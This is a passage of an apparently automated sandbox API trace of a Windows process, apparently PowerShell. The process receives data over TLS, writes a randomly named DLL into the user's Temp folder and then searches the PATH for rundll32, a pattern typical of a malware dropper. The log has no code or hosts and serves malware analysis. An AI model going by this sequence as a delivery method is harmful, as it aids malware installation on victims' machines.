	[0852.674] CertAddCRLLinkToStore (in: hCertStore=0x1b8ddd50, pCrlContext=0x1b8b37e0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0852.674] CertAddCRLLinkToStore (in: hCertStore=0x1b8ddd50, pCrlContext=0x1b8b3760, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0852.677] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b8b3760, pTime=0x1c7dca88, hAdditionalStore=0x1b8ddd50, pChainPara=0x1c7dca90, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c7dca80 | out: ppChainContext=0x1c7dca80) returned 1
	[0855.490] CertDuplicateCertificateChain (pChainContext=0x1cc81520) returned 0x1cc81520
	[0855.491] CertDuplicateCRLContext (pCrlContext=0x1b8b3760) returned 0x1b8b3760
	[0855.492] CertDuplicateCRLContext (pCrlContext=0x1ccc4020) returned 0x1ccc4020
	[0855.492] CertDuplicateCRLContext (pCrlContext=0x1ccc40a0) returned 0x1ccc40a0
	[0855.492] CertFreeCertificateChain (pChainContext=0x1cc81520) 
	[0855.493] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cc81520, pPolicyPara=0x1c7dcc08, pPolicyStatus=0x1c7dcbe8 | out: pPolicyStatus=0x1c7dcbe8) returned 1
	[0855.494] SetLastError (dwErrCode=0x0) 
	[0855.499] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cc81520, pPolicyPara=0x1c7dcce0, pPolicyStatus=0x1c7dccc8 | out: pPolicyStatus=0x1c7dccc8) returned 1
	[0857.415] CertFreeCertificateChain (pChainContext=0x1cc81520) 
	[0857.415] CertFreeCRLContext (pCrlContext=0x1b8b3760) returned 1
	[0858.489] EncryptMessage (in: phContext=0x1c7dd290, fQOP=0x0, pMessage=0x2e50548, MessageSeqNo=0x0 | out: pMessage=0x2e50548) returned 0x0
	[0858.490] send (s=0x4cc, buf=0x2e50288*, len=117, flags=0) returned 117
	[0859.802] setsockopt (s=0x4cc, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0859.803] recv (in: s=0x4cc, buf=0x2e506a8, len=5, flags=0 | out: buf=0x2e506a8*) returned 5
	[0859.803] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0859.804] DecryptMessage (in: phContext=0x1c7dce50, pMessage=0x2e54800, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e54800, pfQOP=0x0) returned 0x0
	[0868.206] setsockopt (s=0x4cc, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0870.866] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.866] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0870.875] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e75e10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e75e10, pfQOP=0x0) returned 0x0
	[0870.875] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.876] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0870.876] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e76050, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e76050, pfQOP=0x0) returned 0x0
	[0870.877] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.877] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0870.877] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e76290, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e76290, pfQOP=0x0) returned 0x0
	[0870.877] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.877] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0870.880] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e764d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e764d0, pfQOP=0x0) returned 0x0
	[0870.881] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.882] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0870.882] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e76760, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e76760, pfQOP=0x0) returned 0x0
	[0870.882] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0870.882] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 4933
	[0870.882] recv (in: s=0x4cc, buf=0x2e51a12, len=11483, flags=0 | out: buf=0x2e51a12*) returned 11483
	[0871.366] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e769a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e769a0, pfQOP=0x0) returned 0x0
	[0871.367] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0871.367] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 304
	[0871.367] recv (in: s=0x4cc, buf=0x2e507fd, len=16112, flags=0 | out: buf=0x2e507fd*) returned 16112
	[0871.771] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e76be0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e76be0, pfQOP=0x0) returned 0x0
	[0871.772] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0871.772] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 6379
	[0871.773] recv (in: s=0x4cc, buf=0x2e51fb8, len=10037, flags=0 | out: buf=0x2e51fb8*) returned 10037
	[0872.215] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e76e48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e76e48, pfQOP=0x0) returned 0x0
	[0872.216] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0872.216] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 7646
	[0872.216] recv (in: s=0x4cc, buf=0x2e524ab, len=8770, flags=0 | out: buf=0x2e524ab*) returned 8770
	[0872.905] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77088, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77088, pfQOP=0x0) returned 0x0
	[0872.905] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0872.905] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 873
	[0872.905] recv (in: s=0x4cc, buf=0x2e50a36, len=15543, flags=0 | out: buf=0x2e50a36*) returned 15543
	[0873.072] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e772c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e772c8, pfQOP=0x0) returned 0x0
	[0873.073] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.074] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3748
	[0873.074] recv (in: s=0x4cc, buf=0x2e51571, len=12668, flags=0 | out: buf=0x2e51571*) returned 2680
	[0873.094] recv (in: s=0x4cc, buf=0x2e51fe9, len=9988, flags=0 | out: buf=0x2e51fe9*) returned 1072
	[0873.094] recv (in: s=0x4cc, buf=0x2e52419, len=8916, flags=0 | out: buf=0x2e52419*) returned 536
	[0873.094] recv (in: s=0x4cc, buf=0x2e52631, len=8380, flags=0 | out: buf=0x2e52631*) returned 536
	[0873.094] recv (in: s=0x4cc, buf=0x2e52849, len=7844, flags=0 | out: buf=0x2e52849*) returned 7844
	[0873.179] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77530, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77530, pfQOP=0x0) returned 0x0
	[0873.180] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.181] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 2871
	[0873.181] recv (in: s=0x4cc, buf=0x2e51204, len=13545, flags=0 | out: buf=0x2e51204*) returned 13545
	[0873.338] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77770, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77770, pfQOP=0x0) returned 0x0
	[0873.340] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.340] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3066
	[0873.340] recv (in: s=0x4cc, buf=0x2e512c7, len=13350, flags=0 | out: buf=0x2e512c7*) returned 13350
	[0873.505] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77a00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77a00, pfQOP=0x0) returned 0x0
	[0873.505] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.506] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 2189
	[0873.506] recv (in: s=0x4cc, buf=0x2e50f5a, len=14227, flags=0 | out: buf=0x2e50f5a*) returned 14227
	[0873.599] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77c40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77c40, pfQOP=0x0) returned 0x0
	[0873.599] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.599] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 1848
	[0873.600] recv (in: s=0x4cc, buf=0x2e50e05, len=14568, flags=0 | out: buf=0x2e50e05*) returned 5360
	[0873.607] recv (in: s=0x4cc, buf=0x2e522f5, len=9208, flags=0 | out: buf=0x2e522f5*) returned 9208
	[0873.693] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e77ea8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e77ea8, pfQOP=0x0) returned 0x0
	[0873.694] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0873.695] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3651
	[0873.695] recv (in: s=0x4cc, buf=0x2e51510, len=12765, flags=0 | out: buf=0x2e51510*) returned 12765
	[0874.341] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e780e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e780e8, pfQOP=0x0) returned 0x0
	[0874.342] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0874.342] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3846
	[0874.342] recv (in: s=0x4cc, buf=0x2e515d3, len=12570, flags=0 | out: buf=0x2e515d3*) returned 12570
	[0874.625] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e78350, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e78350, pfQOP=0x0) returned 0x0
	[0874.626] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0874.626] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3505
	[0874.626] recv (in: s=0x4cc, buf=0x2e5147e, len=12911, flags=0 | out: buf=0x2e5147e*) returned 12911
	[0874.846] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e78590, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e78590, pfQOP=0x0) returned 0x0
	[0874.846] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0874.846] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 6916
	[0874.846] recv (in: s=0x4cc, buf=0x2e521d1, len=9500, flags=0 | out: buf=0x2e521d1*) returned 9500
	[0874.942] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e787d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e787d0, pfQOP=0x0) returned 0x0
	[0874.943] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0874.943] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 5503
	[0874.943] recv (in: s=0x4cc, buf=0x2e51c4c, len=10913, flags=0 | out: buf=0x2e51c4c*) returned 10913
	[0875.034] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e78a10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e78a10, pfQOP=0x0) returned 0x0
	[0875.034] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.034] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 5162
	[0875.034] recv (in: s=0x4cc, buf=0x2e51af7, len=11254, flags=0 | out: buf=0x2e51af7*) returned 11254
	[0875.130] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e78c78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e78c78, pfQOP=0x0) returned 0x0
	[0875.131] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.131] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 4821
	[0875.131] recv (in: s=0x4cc, buf=0x2e519a2, len=11595, flags=0 | out: buf=0x2e519a2*) returned 11595
	[0875.235] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e78eb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e78eb8, pfQOP=0x0) returned 0x0
	[0875.235] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.236] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3408
	[0875.236] recv (in: s=0x4cc, buf=0x2e5141d, len=13008, flags=0 | out: buf=0x2e5141d*) returned 1072
	[0875.275] recv (in: s=0x4cc, buf=0x2e5184d, len=11936, flags=0 | out: buf=0x2e5184d*) returned 2144
	[0875.275] recv (in: s=0x4cc, buf=0x2e520ad, len=9792, flags=0 | out: buf=0x2e520ad*) returned 9792
	[0875.316] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e790f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e790f8, pfQOP=0x0) returned 0x0
	[0875.318] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.318] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 4139
	[0875.318] recv (in: s=0x4cc, buf=0x2e516f8, len=12277, flags=0 | out: buf=0x2e516f8*) returned 12277
	[0875.401] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e79338, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e79338, pfQOP=0x0) returned 0x0
	[0875.401] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.402] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 1654
	[0875.402] recv (in: s=0x4cc, buf=0x2e50d43, len=14762, flags=0 | out: buf=0x2e50d43*) returned 14762
	[0875.482] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e795a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e795a0, pfQOP=0x0) returned 0x0
	[0875.483] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.483] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 241
	[0875.483] recv (in: s=0x4cc, buf=0x2e507be, len=16175, flags=0 | out: buf=0x2e507be*) returned 16175
	[0875.613] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e797e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e797e0, pfQOP=0x0) returned 0x0
	[0875.614] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.614] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 14908
	[0875.614] recv (in: s=0x4cc, buf=0x2e54109, len=1508, flags=0 | out: buf=0x2e54109*) returned 1508
	[0875.643] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e79a20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e79a20, pfQOP=0x0) returned 0x0
	[0875.643] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.643] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 631
	[0875.643] recv (in: s=0x4cc, buf=0x2e50944, len=15785, flags=0 | out: buf=0x2e50944*) returned 15785
	[0875.695] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e79c60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e79c60, pfQOP=0x0) returned 0x0
	[0875.699] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.700] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 2434
	[0875.700] recv (in: s=0x4cc, buf=0x2e5104f, len=13982, flags=0 | out: buf=0x2e5104f*) returned 13982
	[0875.758] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e79ef0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e79ef0, pfQOP=0x0) returned 0x0
	[0875.758] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.758] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 4237
	[0875.758] recv (in: s=0x4cc, buf=0x2e5175a, len=12179, flags=0 | out: buf=0x2e5175a*) returned 12179
	[0875.831] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7a130, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7a130, pfQOP=0x0) returned 0x0
	[0875.831] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.832] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 3896
	[0875.832] recv (in: s=0x4cc, buf=0x2e51605, len=12520, flags=0 | out: buf=0x2e51605*) returned 12520
	[0875.911] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7a370, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7a370, pfQOP=0x0) returned 0x0
	[0875.911] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0875.912] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 1411
	[0875.912] recv (in: s=0x4cc, buf=0x2e50c50, len=15005, flags=0 | out: buf=0x2e50c50*) returned 15005
	[0875.928] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7a5b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7a5b0, pfQOP=0x0) returned 0x0
	[0875.928] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 3
	[0875.929] recv (in: s=0x4cc, buf=0x2e506cb, len=2, flags=0 | out: buf=0x2e506cb*) returned 2
	[0875.934] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 1070
	[0875.934] recv (in: s=0x4cc, buf=0x2e50afb, len=15346, flags=0 | out: buf=0x2e50afb*) returned 15346
	[0876.003] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7a818, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7a818, pfQOP=0x0) returned 0x0
	[0876.003] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0876.003] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 729
	[0876.004] recv (in: s=0x4cc, buf=0x2e509a6, len=15687, flags=0 | out: buf=0x2e509a6*) returned 15687
	[0876.434] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7aa58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7aa58, pfQOP=0x0) returned 0x0
	[0876.435] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0876.435] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 14324
	[0876.436] recv (in: s=0x4cc, buf=0x2e53ec1, len=2092, flags=0 | out: buf=0x2e53ec1*) returned 2092
	[0876.937] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7ac98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7ac98, pfQOP=0x0) returned 0x0
	[0876.938] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0876.938] recv (in: s=0x4cc, buf=0x2e506cd, len=16416, flags=0 | out: buf=0x2e506cd*) returned 16416
	[0876.938] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7aed8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7aed8, pfQOP=0x0) returned 0x0
	[0876.938] recv (in: s=0x4cc, buf=0x2e506c8, len=5, flags=0 | out: buf=0x2e506c8*) returned 5
	[0876.938] recv (in: s=0x4cc, buf=0x2e506cd, len=4752, flags=0 | out: buf=0x2e506cd*) returned 4752
	[0876.939] DecryptMessage (in: phContext=0x1c7dd420, pMessage=0x2e7b0f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e7b0f0, pfQOP=0x0) returned 0x0
	[0876.944] SetEvent (hEvent=0x384) returned 1
	[0901.862] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0901.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0901.862] CoTaskMemFree (pv=0x445e70) 
	[0901.863] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0901.863] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0901.863] CoTaskMemFree (pv=0x445e70) 
	[0901.869] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0901.869] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0901.869] CoTaskMemFree (pv=0x445e70) 
	[0939.172] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c7dd0f0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c7dd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.172] SetErrorMode (uMode=0x1) returned 0x1
	[0939.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a0
	[0940.577] GetFileType (hFile=0x4a0) returned 0x1
	[0940.577] SetErrorMode (uMode=0x1) returned 0x1
	[0940.577] GetFileType (hFile=0x4a0) returned 0x1
	[0940.579] WriteFile (in: hFile=0x4a0, lpBuffer=0x13976d30*, nNumberOfBytesToWrite=0x6fa00, lpNumberOfBytesWritten=0x1c7dd728, lpOverlapped=0x0 | out: lpBuffer=0x13976d30*, lpNumberOfBytesWritten=0x1c7dd728*=0x6fa00, lpOverlapped=0x0) returned 1
	[0945.442] CloseHandle (hObject=0x4a0) returned 1
	[0958.185] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0958.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.185] CoTaskMemFree (pv=0x445e70) 
	[0965.845] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0965.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.845] CoTaskMemFree (pv=0x445e70) 
	[0969.044] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0969.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0969.044] CoTaskMemFree (pv=0x445e70) 
	[0969.047] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0969.047] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0969.047] CoTaskMemFree (pv=0x445e70) 
	[0969.047] CoTaskMemAlloc (cb=0x128) returned 0x401dd0
	[0969.047] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x401dd0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0969.047] CoTaskMemFree (pv=0x401dd0) 
	[0969.051] CoTaskMemAlloc (cb=0x20e) returned 0x1cc44bd0
	[0969.051] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1cc44bd0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0969.051] CoTaskMemFree (pv=0x1cc44bd0) 
	[0969.055] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7dd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0969.056] SetErrorMode (uMode=0x1) returned 0x1
	[0969.059] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\RUNDLL32.EXE", lpFindFileData=0x1c7dd240 | out: lpFindFileData=0x1c7dd240*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0969.408] SetErrorMode (uMode=0x1) returned 0x1
	[0969.409] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7dd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0969.409] SetErrorMode (uMode=0x1) returned 0x1
